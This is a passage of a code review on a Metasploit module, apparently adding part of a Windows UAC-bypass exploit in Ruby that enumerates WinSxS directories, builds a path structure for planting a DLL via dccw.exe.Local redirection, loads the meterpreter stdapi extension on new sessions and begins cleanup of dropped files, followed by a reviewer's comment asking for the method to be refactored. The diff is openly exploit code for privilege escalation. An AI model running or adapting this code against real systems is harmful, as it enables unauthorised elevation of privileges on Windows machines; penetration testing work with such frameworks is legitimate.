modules/exploits/windows/local/bypassuac_injection_winsxs.rb

```diff
@@ -0,0 +1,389 @@
+  def get_directories(payload_filepath, targetedDirectories)
+    directoryNames = []
+    findFileDataSize = 592
+    maxPath = client.railgun.const("MAX_PATH")
+    fileNamePadding = 44
+
+    hFile = client.railgun.kernel32.FindFirstFileA(targetedDirectories, findFileDataSize)
+    if hFile['return'] == client.railgun.const("INVALID_HANDLE_VALUE")
+      fail_with(Failure::Unknown, "Cannot get the targeted directories!")
+    end
+    findFileData = hFile['lpFindFileData']
+
+    begin
+      fileAttributes = findFileData[0, 4].unpack('V').first
+      andOperation = fileAttributes & client.railgun.const("FILE_ATTRIBUTE_DIRECTORY")
+      if andOperation
+        path = "#{payload_filepath}\\#{normalize_path(findFileData[fileNamePadding, fileNamePadding + maxPath])}"
+        directoryNames.push(path)
+    end
+
+    findNextFile = client.railgun.kernel32.FindNextFileA(hFile['return'], findFileDataSize)
+    findFileData = findNextFile['lpFindFileData']
+    end while findNextFile['return'] != false
+
+    if findNextFile['GetLastError'] != client.railgun.const("ERROR_NO_MORE_FILES")
+      fail_with(Failure::Unknown, "Cannot get the targeted directories!")
+    end
+
+    directoryNames
+  end
+
+  #Removes the remainder part composed of 'A' of the path
+  def normalize_path(path)
+    counter = 0
+    while path[counter] != 'A' and path[counter + 1] != 'A' and path[counter + 2] != 'A' do
+    counter = counter + 1
+    end
+
+    path[0, counter + 1]
+  end
+
+  def get_file_paths(win_path, payload_filepath)
+    paths = {}
+    paths[:szElevDll] = 'dccw.exe.Local'
+    paths[:szElevDir] = "#{win_path}\\System32"
+    paths[:szElevDirSysWow64] = "#{win_path}\\sysnative"
+    paths[:szElevExeFull] = "#{paths[:szElevDir]}\\dccw.exe"
+    paths[:szElevDllFull] = "#{paths[:szElevDir]}\\#{paths[:szElevDll]}"
+    paths[:szTempDllPath] = payload_filepath
+
+    paths
+  end
+
+  # Creates the paths struct which contains all the required paths
+  # the dll needs to copy/execute etc.
+  def create_struct(paths)
+
+    # write each path to the structure in the order they
+    # are defined in the bypass uac binary.
+    struct = ''
+    struct << fill_struct_path(paths[:szElevDir])
+    struct << fill_struct_path(paths[:szElevDirSysWow64])
+    struct << fill_struct_path(paths[:szElevDll])
+    struct << fill_struct_path(paths[:szElevDllFull])
+    struct << fill_struct_path(paths[:szElevExeFull])
+    struct << fill_struct_path(paths[:szTempDllPath])
+
+    struct
+  end
+
+  def fill_struct_path(path)
+    path = Rex::Text.to_unicode(path)
+    path + "\x00" * (520 - path.length)
+  end
+
+  def on_new_session(session)
+    if session.type == 'meterpreter'
+      session.core.use('stdapi') unless session.ext.aliases.include?('stdapi')
+    end
+    remove_dropped_elements(session)
+  end
+
+  # Remove all the created and dropped files and folders
+  def remove_dropped_elements(session)
```

Comment:
This method is overly large and could be refactored out into several smaller methods